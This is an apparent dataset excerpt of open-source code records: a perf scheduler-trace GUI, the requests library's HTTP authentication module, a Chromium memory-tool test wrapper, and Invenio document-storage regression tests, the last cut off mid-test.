repo_name
stringlengths 6
100
| path
stringlengths 4
294
| copies
stringlengths 1
5
| size
stringlengths 4
6
| content
stringlengths 606
896k
| license
stringclasses 15
values |
---|---|---|---|---|---|
AttiJeong98/Solid_Kernel-Stock
|
tools/perf/scripts/python/Perf-Trace-Util/lib/Perf/Trace/SchedGui.py
|
12980
|
5411
|
# SchedGui.py - Python extension for perf script, basic GUI code for
# traces drawing and overview.
#
# Copyright (C) 2010 by Frederic Weisbecker <fweisbec@gmail.com>
#
# This software is distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
try:
import wx
except ImportError:
raise ImportError, "You need to install the wxpython lib for this script"
class RootFrame(wx.Frame):
Y_OFFSET = 100
RECT_HEIGHT = 100
RECT_SPACE = 50
EVENT_MARKING_WIDTH = 5
def __init__(self, sched_tracer, title, parent = None, id = -1):
wx.Frame.__init__(self, parent, id, title)
(self.screen_width, self.screen_height) = wx.GetDisplaySize()
self.screen_width -= 10
self.screen_height -= 10
self.zoom = 0.5
self.scroll_scale = 20
self.sched_tracer = sched_tracer
self.sched_tracer.set_root_win(self)
(self.ts_start, self.ts_end) = sched_tracer.interval()
self.update_width_virtual()
self.nr_rects = sched_tracer.nr_rectangles() + 1
self.height_virtual = RootFrame.Y_OFFSET + (self.nr_rects * (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE))
# whole window panel
self.panel = wx.Panel(self, size=(self.screen_width, self.screen_height))
# scrollable container
self.scroll = wx.ScrolledWindow(self.panel)
self.scroll.SetScrollbars(self.scroll_scale, self.scroll_scale, self.width_virtual / self.scroll_scale, self.height_virtual / self.scroll_scale)
self.scroll.EnableScrolling(True, True)
self.scroll.SetFocus()
# scrollable drawing area
self.scroll_panel = wx.Panel(self.scroll, size=(self.screen_width - 15, self.screen_height / 2))
self.scroll_panel.Bind(wx.EVT_PAINT, self.on_paint)
self.scroll_panel.Bind(wx.EVT_KEY_DOWN, self.on_key_press)
self.scroll_panel.Bind(wx.EVT_LEFT_DOWN, self.on_mouse_down)
self.scroll.Bind(wx.EVT_PAINT, self.on_paint)
self.scroll.Bind(wx.EVT_KEY_DOWN, self.on_key_press)
self.scroll.Bind(wx.EVT_LEFT_DOWN, self.on_mouse_down)
self.scroll.Fit()
self.Fit()
self.scroll_panel.SetDimensions(-1, -1, self.width_virtual, self.height_virtual, wx.SIZE_USE_EXISTING)
self.txt = None
self.Show(True)
def us_to_px(self, val):
return val / (10 ** 3) * self.zoom
def px_to_us(self, val):
return (val / self.zoom) * (10 ** 3)
def scroll_start(self):
(x, y) = self.scroll.GetViewStart()
return (x * self.scroll_scale, y * self.scroll_scale)
def scroll_start_us(self):
(x, y) = self.scroll_start()
return self.px_to_us(x)
def paint_rectangle_zone(self, nr, color, top_color, start, end):
offset_px = self.us_to_px(start - self.ts_start)
width_px = self.us_to_px(end - self.ts_start)
offset_py = RootFrame.Y_OFFSET + (nr * (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE))
width_py = RootFrame.RECT_HEIGHT
dc = self.dc
if top_color is not None:
(r, g, b) = top_color
top_color = wx.Colour(r, g, b)
brush = wx.Brush(top_color, wx.SOLID)
dc.SetBrush(brush)
dc.DrawRectangle(offset_px, offset_py, width_px, RootFrame.EVENT_MARKING_WIDTH)
width_py -= RootFrame.EVENT_MARKING_WIDTH
offset_py += RootFrame.EVENT_MARKING_WIDTH
(r ,g, b) = color
color = wx.Colour(r, g, b)
brush = wx.Brush(color, wx.SOLID)
dc.SetBrush(brush)
dc.DrawRectangle(offset_px, offset_py, width_px, width_py)
def update_rectangles(self, dc, start, end):
start += self.ts_start
end += self.ts_start
self.sched_tracer.fill_zone(start, end)
def on_paint(self, event):
dc = wx.PaintDC(self.scroll_panel)
self.dc = dc
width = min(self.width_virtual, self.screen_width)
(x, y) = self.scroll_start()
start = self.px_to_us(x)
end = self.px_to_us(x + width)
self.update_rectangles(dc, start, end)
def rect_from_ypixel(self, y):
y -= RootFrame.Y_OFFSET
rect = y / (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE)
height = y % (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE)
if rect < 0 or rect > self.nr_rects - 1 or height > RootFrame.RECT_HEIGHT:
return -1
return rect
def update_summary(self, txt):
if self.txt:
self.txt.Destroy()
self.txt = wx.StaticText(self.panel, -1, txt, (0, (self.screen_height / 2) + 50))
def on_mouse_down(self, event):
(x, y) = event.GetPositionTuple()
rect = self.rect_from_ypixel(y)
if rect == -1:
return
t = self.px_to_us(x) + self.ts_start
self.sched_tracer.mouse_down(rect, t)
def update_width_virtual(self):
self.width_virtual = self.us_to_px(self.ts_end - self.ts_start)
def __zoom(self, x):
self.update_width_virtual()
(xpos, ypos) = self.scroll.GetViewStart()
xpos = self.us_to_px(x) / self.scroll_scale
self.scroll.SetScrollbars(self.scroll_scale, self.scroll_scale, self.width_virtual / self.scroll_scale, self.height_virtual / self.scroll_scale, xpos, ypos)
self.Refresh()
def zoom_in(self):
x = self.scroll_start_us()
self.zoom *= 2
self.__zoom(x)
def zoom_out(self):
x = self.scroll_start_us()
self.zoom /= 2
self.__zoom(x)
def on_key_press(self, event):
key = event.GetRawKeyCode()
if key == ord("+"):
self.zoom_in()
return
if key == ord("-"):
self.zoom_out()
return
key = event.GetKeyCode()
(x, y) = self.scroll.GetViewStart()
if key == wx.WXK_RIGHT:
self.scroll.Scroll(x + 1, y)
elif key == wx.WXK_LEFT:
self.scroll.Scroll(x - 1, y)
elif key == wx.WXK_DOWN:
self.scroll.Scroll(x, y + 1)
elif key == wx.WXK_UP:
self.scroll.Scroll(x, y - 1)
|
gpl-2.0
|
shermanng10/superathletebuilder
|
env/lib/python2.7/site-packages/pip/_vendor/requests/auth.py
|
413
|
6794
|
# -*- coding: utf-8 -*-
"""
requests.auth
~~~~~~~~~~~~~
This module contains the authentication handlers for Requests.
"""
import os
import re
import time
import hashlib
from base64 import b64encode
from .compat import urlparse, str
from .cookies import extract_cookies_to_jar
from .utils import parse_dict_header, to_native_string
from .status_codes import codes
CONTENT_TYPE_FORM_URLENCODED = 'application/x-www-form-urlencoded'
CONTENT_TYPE_MULTI_PART = 'multipart/form-data'
def _basic_auth_str(username, password):
"""Returns a Basic Auth string."""
authstr = 'Basic ' + to_native_string(
b64encode(('%s:%s' % (username, password)).encode('latin1')).strip()
)
return authstr
class AuthBase(object):
"""Base class that all auth implementations derive from"""
def __call__(self, r):
raise NotImplementedError('Auth hooks must be callable.')
class HTTPBasicAuth(AuthBase):
"""Attaches HTTP Basic Authentication to the given Request object."""
def __init__(self, username, password):
self.username = username
self.password = password
def __call__(self, r):
r.headers['Authorization'] = _basic_auth_str(self.username, self.password)
return r
class HTTPProxyAuth(HTTPBasicAuth):
"""Attaches HTTP Proxy Authentication to a given Request object."""
def __call__(self, r):
r.headers['Proxy-Authorization'] = _basic_auth_str(self.username, self.password)
return r
class HTTPDigestAuth(AuthBase):
"""Attaches HTTP Digest Authentication to the given Request object."""
def __init__(self, username, password):
self.username = username
self.password = password
self.last_nonce = ''
self.nonce_count = 0
self.chal = {}
self.pos = None
self.num_401_calls = 1
def build_digest_header(self, method, url):
realm = self.chal['realm']
nonce = self.chal['nonce']
qop = self.chal.get('qop')
algorithm = self.chal.get('algorithm')
opaque = self.chal.get('opaque')
if algorithm is None:
_algorithm = 'MD5'
else:
_algorithm = algorithm.upper()
# lambdas assume digest modules are imported at the top level
if _algorithm == 'MD5' or _algorithm == 'MD5-SESS':
def md5_utf8(x):
if isinstance(x, str):
x = x.encode('utf-8')
return hashlib.md5(x).hexdigest()
hash_utf8 = md5_utf8
elif _algorithm == 'SHA':
def sha_utf8(x):
if isinstance(x, str):
x = x.encode('utf-8')
return hashlib.sha1(x).hexdigest()
hash_utf8 = sha_utf8
KD = lambda s, d: hash_utf8("%s:%s" % (s, d))
if hash_utf8 is None:
return None
# XXX not implemented yet
entdig = None
p_parsed = urlparse(url)
#: path is request-uri defined in RFC 2616 which should not be empty
path = p_parsed.path or "/"
if p_parsed.query:
path += '?' + p_parsed.query
A1 = '%s:%s:%s' % (self.username, realm, self.password)
A2 = '%s:%s' % (method, path)
HA1 = hash_utf8(A1)
HA2 = hash_utf8(A2)
if nonce == self.last_nonce:
self.nonce_count += 1
else:
self.nonce_count = 1
ncvalue = '%08x' % self.nonce_count
s = str(self.nonce_count).encode('utf-8')
s += nonce.encode('utf-8')
s += time.ctime().encode('utf-8')
s += os.urandom(8)
cnonce = (hashlib.sha1(s).hexdigest()[:16])
if _algorithm == 'MD5-SESS':
HA1 = hash_utf8('%s:%s:%s' % (HA1, nonce, cnonce))
if qop is None:
respdig = KD(HA1, "%s:%s" % (nonce, HA2))
elif qop == 'auth' or 'auth' in qop.split(','):
noncebit = "%s:%s:%s:%s:%s" % (
nonce, ncvalue, cnonce, 'auth', HA2
)
respdig = KD(HA1, noncebit)
else:
# XXX handle auth-int.
return None
self.last_nonce = nonce
# XXX should the partial digests be encoded too?
base = 'username="%s", realm="%s", nonce="%s", uri="%s", ' \
'response="%s"' % (self.username, realm, nonce, path, respdig)
if opaque:
base += ', opaque="%s"' % opaque
if algorithm:
base += ', algorithm="%s"' % algorithm
if entdig:
base += ', digest="%s"' % entdig
if qop:
base += ', qop="auth", nc=%s, cnonce="%s"' % (ncvalue, cnonce)
return 'Digest %s' % (base)
def handle_redirect(self, r, **kwargs):
"""Reset num_401_calls counter on redirects."""
if r.is_redirect:
self.num_401_calls = 1
def handle_401(self, r, **kwargs):
"""Takes the given response and tries digest-auth, if needed."""
if self.pos is not None:
# Rewind the file position indicator of the body to where
# it was to resend the request.
r.request.body.seek(self.pos)
num_401_calls = getattr(self, 'num_401_calls', 1)
s_auth = r.headers.get('www-authenticate', '')
if 'digest' in s_auth.lower() and num_401_calls < 2:
self.num_401_calls += 1
pat = re.compile(r'digest ', flags=re.IGNORECASE)
self.chal = parse_dict_header(pat.sub('', s_auth, count=1))
# Consume content and release the original connection
# to allow our new request to reuse the same one.
r.content
r.raw.release_conn()
prep = r.request.copy()
extract_cookies_to_jar(prep._cookies, r.request, r.raw)
prep.prepare_cookies(prep._cookies)
prep.headers['Authorization'] = self.build_digest_header(
prep.method, prep.url)
_r = r.connection.send(prep, **kwargs)
_r.history.append(r)
_r.request = prep
return _r
self.num_401_calls = 1
return r
def __call__(self, r):
# If we have a saved nonce, skip the 401
if self.last_nonce:
r.headers['Authorization'] = self.build_digest_header(r.method, r.url)
try:
self.pos = r.body.tell()
except AttributeError:
# In the case of HTTPDigestAuth being reused and the body of
# the previous request was a file-like object, pos has the
# file position of the previous body. Ensure it's set to
# None.
self.pos = None
r.register_hook('response', self.handle_401)
r.register_hook('response', self.handle_redirect)
return r
|
mit
|
gavinp/chromium
|
tools/valgrind/browser_wrapper_win.py
|
80
|
1636
|
# Copyright (c) 2011 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import glob
import os
import re
import sys
import subprocess
# TODO(timurrrr): we may use it on POSIX too to avoid code duplication once we
# support layout_tests, remove Dr. Memory specific code and verify it works
# on a "clean" Mac.
testcase_name = None
for arg in sys.argv:
m = re.match("\-\-test\-name=(.*)", arg)
if m:
assert testcase_name is None
testcase_name = m.groups()[0]
# arg #0 is the path to this python script
cmd_to_run = sys.argv[1:]
# TODO(timurrrr): this is Dr. Memory-specific
# Usually, we pass "-logdir" "foo\bar\spam path" args to Dr. Memory.
# To group reports per UI test, we want to put the reports for each test into a
# separate directory. This code can be simplified when we have
# http://code.google.com/p/drmemory/issues/detail?id=684 fixed.
logdir_idx = cmd_to_run.index("-logdir")
old_logdir = cmd_to_run[logdir_idx + 1]
wrapper_pid = str(os.getpid())
# On Windows, there is a chance of PID collision. We avoid it by appending the
# number of entries in the logdir at the end of wrapper_pid.
# This number is monotonic and we can't have two simultaneously running wrappers
# with the same PID.
wrapper_pid += "_%d" % len(glob.glob(old_logdir + "\\*"))
cmd_to_run[logdir_idx + 1] += "\\testcase.%s.logs" % wrapper_pid
os.makedirs(cmd_to_run[logdir_idx + 1])
if testcase_name:
f = open(old_logdir + "\\testcase.%s.name" % wrapper_pid, "w")
print >>f, testcase_name
f.close()
exit(subprocess.call(cmd_to_run))
|
bsd-3-clause
|
chokribr/inveniotest
|
modules/bibdocfile/lib/bibdocfile_regression_tests.py
|
10
|
30584
|
# -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2009, 2010, 2011, 2012, 2013 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""BibDocFile Regression Test Suite."""
__revision__ = "$Id$"
import shutil
import os
from invenio.testutils import InvenioTestCase
from invenio.testutils import make_test_suite, run_test_suite
from invenio.bibdocfile import BibRecDocs, BibRelation, MoreInfo, \
check_bibdoc_authorization, bibdocfile_url_p, guess_format_from_url, CFG_HAS_MAGIC, \
Md5Folder, calculate_md5, calculate_md5_external
from invenio.dbquery import run_sql
from invenio.access_control_config import CFG_WEBACCESS_WARNING_MSGS
from invenio.config import \
CFG_SITE_URL, \
CFG_PREFIX, \
CFG_BIBDOCFILE_FILEDIR, \
CFG_SITE_RECORD, \
CFG_WEBDIR, \
CFG_TMPDIR, \
CFG_PATH_MD5SUM
import invenio.template
from datetime import datetime
import time
class BibDocFsInfoTest(InvenioTestCase):
"""Regression tests about the table bibdocfsinfo"""
def setUp(self):
self.my_bibrecdoc = BibRecDocs(2)
self.unique_name = self.my_bibrecdoc.propose_unique_docname('file')
self.my_bibdoc = self.my_bibrecdoc.add_new_file(CFG_PREFIX + '/lib/webtest/invenio/test.jpg', docname=self.unique_name)
self.my_bibdoc_id = self.my_bibdoc.id
def tearDown(self):
self.my_bibdoc.expunge()
def test_hard_delete(self):
"""bibdocfile - test correct update of bibdocfsinfo when hard-deleting"""
self.assertEqual(run_sql("SELECT MAX(version) FROM bibdocfsinfo WHERE id_bibdoc=%s", (self.my_bibdoc_id, ))[0][0], 1)
self.assertEqual(run_sql("SELECT last_version FROM bibdocfsinfo WHERE id_bibdoc=%s AND version=1 AND format='.jpg'", (self.my_bibdoc_id, ))[0][0], True)
self.my_bibdoc.add_file_new_version(CFG_PREFIX + '/lib/webtest/invenio/test.gif')
self.assertEqual(run_sql("SELECT MAX(version) FROM bibdocfsinfo WHERE id_bibdoc=%s", (self.my_bibdoc_id, ))[0][0], 2)
self.assertEqual(run_sql("SELECT last_version FROM bibdocfsinfo WHERE id_bibdoc=%s AND version=2 AND format='.gif'", (self.my_bibdoc_id, ))[0][0], True)
self.assertEqual(run_sql("SELECT last_version FROM bibdocfsinfo WHERE id_bibdoc=%s AND version=1 AND format='.jpg'", (self.my_bibdoc_id, ))[0][0], False)
self.my_bibdoc.delete_file('.gif', 2)
self.assertEqual(run_sql("SELECT MAX(version) FROM bibdocfsinfo WHERE id_bibdoc=%s", (self.my_bibdoc_id, ))[0][0], 1)
self.assertEqual(run_sql("SELECT last_version FROM bibdocfsinfo WHERE id_bibdoc=%s AND version=1 AND format='.jpg'", (self.my_bibdoc_id, ))[0][0], True)
class BibDocFileGuessFormat(InvenioTestCase):
"""Regression tests for guess_format_from_url"""
def test_guess_format_from_url_local_no_ext(self):
"""bibdocfile - guess_format_from_url(), local URL, no extension"""
self.assertEqual(guess_format_from_url(os.path.join(CFG_WEBDIR, 'img', 'test')), '.bin')
if CFG_HAS_MAGIC:
def test_guess_format_from_url_local_no_ext_with_magic(self):
"""bibdocfile - guess_format_from_url(), local URL, no extension, with magic"""
self.assertEqual(guess_format_from_url(os.path.join(CFG_WEBDIR, 'img', 'testgif')), '.gif')
else:
def test_guess_format_from_url_local_no_ext_with_magic(self):
"""bibdocfile - guess_format_from_url(), local URL, no extension, no magic"""
self.assertEqual(guess_format_from_url(os.path.join(CFG_WEBDIR, 'img', 'testgif')), '.bin')
def test_guess_format_from_url_local_unknown_ext(self):
"""bibdocfile - guess_format_from_url(), local URL, unknown extension"""
self.assertEqual(guess_format_from_url(os.path.join(CFG_WEBDIR, 'img', 'test.foo')), '.foo')
def test_guess_format_from_url_local_known_ext(self):
"""bibdocfile - guess_format_from_url(), local URL, unknown extension"""
self.assertEqual(guess_format_from_url(os.path.join(CFG_WEBDIR, 'img', 'test.gif')), '.gif')
def test_guess_format_from_url_remote_no_ext(self):
"""bibdocfile - guess_format_from_url(), remote URL, no extension"""
self.assertEqual(guess_format_from_url(CFG_SITE_URL + '/img/test'), '.bin')
if CFG_HAS_MAGIC:
def test_guess_format_from_url_remote_no_ext_with_magic(self):
"""bibdocfile - guess_format_from_url(), remote URL, no extension, with magic"""
self.assertEqual(guess_format_from_url(CFG_SITE_URL + '/img/testgif'), '.gif')
else:
def test_guess_format_from_url_remote_no_ext_with_magic(self):
"""bibdocfile - guess_format_from_url(), remote URL, no extension, no magic"""
self.failUnless(guess_format_from_url(CFG_SITE_URL + '/img/testgif') in ('.bin', '.gif'))
if CFG_HAS_MAGIC:
def test_guess_format_from_url_remote_unknown_ext(self):
"""bibdocfile - guess_format_from_url(), remote URL, unknown extension, with magic"""
self.assertEqual(guess_format_from_url(CFG_SITE_URL + '/img/test.foo'), '.gif')
else:
def test_guess_format_from_url_remote_unknown_ext(self):
"""bibdocfile - guess_format_from_url(), remote URL, unknown extension, no magic"""
self.failUnless(guess_format_from_url(CFG_SITE_URL + '/img/test.foo') in ('.bin', '.gif'))
def test_guess_format_from_url_remote_known_ext(self):
"""bibdocfile - guess_format_from_url(), remote URL, known extension"""
self.assertEqual(guess_format_from_url(CFG_SITE_URL + '/img/test.gif'), '.gif')
def test_guess_format_from_url_local_gpl_license(self):
local_path = os.path.join(CFG_TMPDIR, 'LICENSE')
print >> open(local_path, 'w'), """
GNU GENERAL PUBLIC LICENSE
Version 2, June 1991
Copyright (C) 1989, 1991 Free Software Foundation, Inc.
59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The licenses for most software are designed to take away your
freedom to share and change it. By contrast, the GNU General Public
License is intended to guarantee your freedom to share and change free
software--to make sure the software is free for all its users. This
General Public License applies to most of the Free Software
Foundation's software and to any other program whose authors commit to
using it. (Some other Free Software Foundation software is covered by
the GNU Library General Public License instead.) You can apply it to
your programs, too.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
this service if you wish), that you receive source code or can get it
if you want it, that you can change the software or use pieces of it
in new free programs; and that you know you can do these things.
To protect your rights, we need to make restrictions that forbid
anyone to deny you these rights or to ask you to surrender the rights.
These restrictions translate to certain responsibilities for you if you
distribute copies of the software, or if you modify it.
[...]
"""
try:
if CFG_HAS_MAGIC:
self.assertEqual(guess_format_from_url(local_path), '.txt')
else:
self.assertEqual(guess_format_from_url(local_path), '.bin')
finally:
os.remove(local_path)
class BibRecDocsTest(InvenioTestCase):
"""regression tests about BibRecDocs"""
def test_BibRecDocs(self):
"""bibdocfile - BibRecDocs functions"""
my_bibrecdoc = BibRecDocs(2)
#add bibdoc
my_bibrecdoc.add_new_file(CFG_PREFIX + '/lib/webtest/invenio/test.jpg', 'Main', 'img_test', False, 'test add new file', 'test', '.jpg')
my_bibrecdoc.add_bibdoc(doctype='Main', docname='file', never_fail=False)
self.assertEqual(len(my_bibrecdoc.list_bibdocs()), 3)
my_added_bibdoc = my_bibrecdoc.get_bibdoc('file')
#add bibdocfile in empty bibdoc
my_added_bibdoc.add_file_new_version(CFG_PREFIX + '/lib/webtest/invenio/test.gif', \
description= 'added in empty bibdoc', comment=None, docformat=None, flags=['PERFORM_HIDE_PREVIOUS'])
#propose unique docname
self.assertEqual(my_bibrecdoc.propose_unique_docname('file'), 'file_2')
#has docname
self.assertEqual(my_bibrecdoc.has_docname_p('file'), True)
#merge 2 bibdocs
my_bibrecdoc.merge_bibdocs('img_test', 'file')
self.assertEqual(len(my_bibrecdoc.get_bibdoc("img_test").list_all_files()), 2)
#check file exists
self.assertEqual(my_bibrecdoc.check_file_exists(CFG_PREFIX + '/lib/webtest/invenio/test.jpg', '.jpg'), True)
#get bibdoc names
# we can not rely on the order !
names = set([my_bibrecdoc.get_bibdoc_names('Main')[0], my_bibrecdoc.get_bibdoc_names('Main')[1]])
self.assertTrue('0104007_02' in names)
self.assertTrue('img_test' in names)
#get total size
self.assertEqual(my_bibrecdoc.get_total_size(), 1647591)
#get total size latest version
self.assertEqual(my_bibrecdoc.get_total_size_latest_version(), 1647591)
#display
#value = my_bibrecdoc.display(docname='img_test', version='', doctype='', ln='en', verbose=0, display_hidden=True)
#self.assert_("<small><b>Main</b>" in value)
#get xml 8564
value = my_bibrecdoc.get_xml_8564()
self.assert_('/'+ CFG_SITE_RECORD +'/2/files/img_test.jpg</subfield>' in value)
#check duplicate docnames
self.assertEqual(my_bibrecdoc.check_duplicate_docnames(), True)
def tearDown(self):
my_bibrecdoc = BibRecDocs(2)
#delete
my_bibrecdoc.delete_bibdoc('img_test')
my_bibrecdoc.delete_bibdoc('file')
my_bibrecdoc.delete_bibdoc('test')
class BibDocsTest(InvenioTestCase):
"""regression tests about BibDocs"""
def test_BibDocs(self):
"""bibdocfile - BibDocs functions"""
#add file
my_bibrecdoc = BibRecDocs(2)
timestamp1 = datetime(*(time.strptime("2011-10-09 08:07:06", "%Y-%m-%d %H:%M:%S")[:6]))
my_bibrecdoc.add_new_file(CFG_PREFIX + '/lib/webtest/invenio/test.jpg', 'Main', 'img_test', False, 'test add new file', 'test', '.jpg', modification_date=timestamp1)
my_new_bibdoc = my_bibrecdoc.get_bibdoc("img_test")
value = my_bibrecdoc.list_bibdocs()
self.assertEqual(len(value), 2)
#get total file (bibdoc)
self.assertEqual(my_new_bibdoc.get_total_size(), 91750)
#get recid
self.assertEqual(my_new_bibdoc.bibrec_links[0]["recid"], 2)
#change name
my_new_bibdoc.change_name(2, 'new_name')
#get docname
my_bibrecdoc = BibRecDocs(2)
self.assertEqual(my_bibrecdoc.get_docname(my_new_bibdoc.id), 'new_name')
#get type
self.assertEqual(my_new_bibdoc.get_type(), 'Main')
#get id
self.assert_(my_new_bibdoc.get_id() > 80)
#set status
my_new_bibdoc.set_status('new status')
#get status
self.assertEqual(my_new_bibdoc.get_status(), 'new status')
#get base directory
self.assert_(my_new_bibdoc.get_base_dir().startswith(CFG_BIBDOCFILE_FILEDIR))
#get file number
self.assertEqual(my_new_bibdoc.get_file_number(), 1)
#add file new version
timestamp2 = datetime(*(time.strptime("2010-09-08 07:06:05", "%Y-%m-%d %H:%M:%S")[:6]))
my_new_bibdoc.add_file_new_version(CFG_PREFIX + '/lib/webtest/invenio/test.jpg', description= 'the new version', comment=None, docformat=None, flags=["PERFORM_HIDE_PREVIOUS"], modification_date=timestamp2)
self.assertEqual(my_new_bibdoc.list_versions(), [1, 2])
#revert
timestamp3 = datetime.now()
time.sleep(2) # so we can see a difference between now() and the time of the revert
my_new_bibdoc.revert(1)
self.assertEqual(my_new_bibdoc.list_versions(), [1, 2, 3])
self.assertEqual(my_new_bibdoc.get_description('.jpg', version=3), 'test add new file')
#get total size latest version
self.assertEqual(my_new_bibdoc.get_total_size_latest_version(), 91750)
#get latest version
self.assertEqual(my_new_bibdoc.get_latest_version(), 3)
#list latest files
self.assertEqual(len(my_new_bibdoc.list_latest_files()), 1)
self.assertEqual(my_new_bibdoc.list_latest_files()[0].get_version(), 3)
#list version files
self.assertEqual(len(my_new_bibdoc.list_version_files(1, list_hidden=True)), 1)
#display # No Display facility inside of an object !
# value = my_new_bibdoc.display(version='', ln='en', display_hidden=True)
# self.assert_('>test add new file<' in value)
#format already exist
self.assertEqual(my_new_bibdoc.format_already_exists_p('.jpg'), True)
#get file
self.assertEqual(my_new_bibdoc.get_file('.jpg', version='1').get_version(), 1)
#set description
my_new_bibdoc.set_description('new description', '.jpg', version=1)
#get description
self.assertEqual(my_new_bibdoc.get_description('.jpg', version=1), 'new description')
#set comment
my_new_bibdoc.set_description('new comment', '.jpg', version=1)
#get comment
self.assertEqual(my_new_bibdoc.get_description('.jpg', version=1), 'new comment')
#get history
assert len(my_new_bibdoc.get_history()) > 0
#check modification date
self.assertEqual(my_new_bibdoc.get_file('.jpg', version=1).md, timestamp1)
self.assertEqual(my_new_bibdoc.get_file('.jpg', version=2).md, timestamp2)
assert my_new_bibdoc.get_file('.jpg', version=3).md > timestamp3
#delete file
my_new_bibdoc.delete_file('.jpg', 2)
#list all files
self.assertEqual(len(my_new_bibdoc.list_all_files()), 2)
#delete file
my_new_bibdoc.delete_file('.jpg', 3)
#add new format
timestamp4 = datetime(*(time.strptime("2012-11-10 09:08:07", "%Y-%m-%d %H:%M:%S")[:6]))
my_new_bibdoc.add_file_new_format(CFG_PREFIX + '/lib/webtest/invenio/test.gif', version=None, description=None, comment=None, docformat=None, modification_date=timestamp4)
self.assertEqual(len(my_new_bibdoc.list_all_files()), 2)
#check modification time
self.assertEqual(my_new_bibdoc.get_file('.jpg', version=1).md, timestamp1)
self.assertEqual(my_new_bibdoc.get_file('.gif', version=1).md, timestamp4)
#change the format name
my_new_bibdoc.change_docformat('.gif', '.gif;icon-640')
self.assertEqual(my_new_bibdoc.format_already_exists_p('.gif'), False)
self.assertEqual(my_new_bibdoc.format_already_exists_p('.gif;icon-640'), True)
#delete file
my_new_bibdoc.delete_file('.jpg', 1)
#delete file
my_new_bibdoc.delete_file('.gif;icon-640', 1)
#empty bibdoc
self.assertEqual(my_new_bibdoc.empty_p(), True)
#hidden?
self.assertEqual(my_new_bibdoc.hidden_p('.jpg', version=1), False)
#hide
my_new_bibdoc.set_flag('HIDDEN', '.jpg', version=1)
#hidden?
self.assertEqual(my_new_bibdoc.hidden_p('.jpg', version=1), True)
#add and get icon
my_new_bibdoc.add_icon( CFG_PREFIX + '/lib/webtest/invenio/icon-test.gif', modification_date=timestamp4)
my_bibrecdoc = BibRecDocs(2)
value = my_bibrecdoc.get_bibdoc("new_name")
self.assertEqual(value.get_icon().docid, my_new_bibdoc.get_icon().docid)
self.assertEqual(value.get_icon().version, my_new_bibdoc.get_icon().version)
self.assertEqual(value.get_icon().format, my_new_bibdoc.get_icon().format)
#check modification time
self.assertEqual(my_new_bibdoc.get_icon().md, timestamp4)
#delete icon
my_new_bibdoc.delete_icon()
#get icon
self.assertEqual(my_new_bibdoc.get_icon(), None)
#delete
my_new_bibdoc.delete()
self.assertEqual(my_new_bibdoc.deleted_p(), True)
#undelete
my_new_bibdoc.undelete(previous_status='', recid=2)
#expunging
my_new_bibdoc.expunge()
my_bibrecdoc.build_bibdoc_list()
self.failIf('new_name' in my_bibrecdoc.get_bibdoc_names())
self.failUnless(my_bibrecdoc.get_bibdoc_names())
def tearDown(self):
my_bibrecdoc = BibRecDocs(2)
#delete
my_bibrecdoc.delete_bibdoc('img_test')
my_bibrecdoc.delete_bibdoc('new_name')
class BibRelationTest(InvenioTestCase):
""" regression tests for BibRelation"""
def test_RelationCreation_Version(self):
"""
Testing relations between particular versions of a document
We create two relations differing only on the BibDoc version
number and verify that they are indeed differen (store different data)
"""
rel1 = BibRelation.create(bibdoc1_id = 10, bibdoc2_id=12,
bibdoc1_ver = 1, bibdoc2_ver = 1,
rel_type = "some_rel")
rel2 = BibRelation.create(bibdoc1_id = 10, bibdoc2_id=12,
bibdoc1_ver = 1, bibdoc2_ver = 2,
rel_type = "some_rel")
rel1["key1"] = "value1"
rel1["key2"] = "value2"
rel2["key1"] = "value3"
# now testing the retrieval of data
new_rel1 = BibRelation(bibdoc1_id = 10, bibdoc2_id = 12,
rel_type = "some_rel", bibdoc1_ver = 1,
bibdoc2_ver = 1)
new_rel2 = BibRelation(bibdoc1_id = 10, bibdoc2_id = 12,
rel_type = "some_rel", bibdoc1_ver = 1,
bibdoc2_ver = 2)
self.assertEqual(new_rel1["key1"], "value1")
self.assertEqual(new_rel1["key2"], "value2")
self.assertEqual(new_rel2["key1"], "value3")
# now testing the deletion of relations
new_rel1.delete()
new_rel2.delete()
newer_rel1 = BibRelation.create(bibdoc1_id = 10, bibdoc2_id=12,
bibdoc1_ver = 1, bibdoc2_ver = 1,
rel_type = "some_rel")
newer_rel2 = BibRelation.create(bibdoc1_id = 10, bibdoc2_id=12,
bibdoc1_ver = 1, bibdoc2_ver = 2,
rel_type = "some_rel")
self.assertEqual("key1" in newer_rel1, False)
self.assertEqual("key1" in newer_rel2, False)
newer_rel1.delete()
newer_rel2.delete()
class BibDocFilesTest(InvenioTestCase):
"""regression tests about BibDocFiles"""
def test_BibDocFiles(self):
"""bibdocfile - BibDocFile functions """
#add bibdoc
my_bibrecdoc = BibRecDocs(2)
timestamp = datetime(*(time.strptime("2010-09-08 07:06:05", "%Y-%m-%d %H:%M:%S")[:6]))
my_bibrecdoc.add_new_file(CFG_PREFIX + '/lib/webtest/invenio/test.jpg', 'Main', 'img_test', False, 'test add new file', 'test', '.jpg', modification_date=timestamp)
my_new_bibdoc = my_bibrecdoc.get_bibdoc("img_test")
my_new_bibdocfile = my_new_bibdoc.list_all_files()[0]
#get url
self.assertEqual(my_new_bibdocfile.get_url(), CFG_SITE_URL + '/%s/2/files/img_test.jpg' % CFG_SITE_RECORD)
#get type
self.assertEqual(my_new_bibdocfile.get_type(), 'Main')
#get path
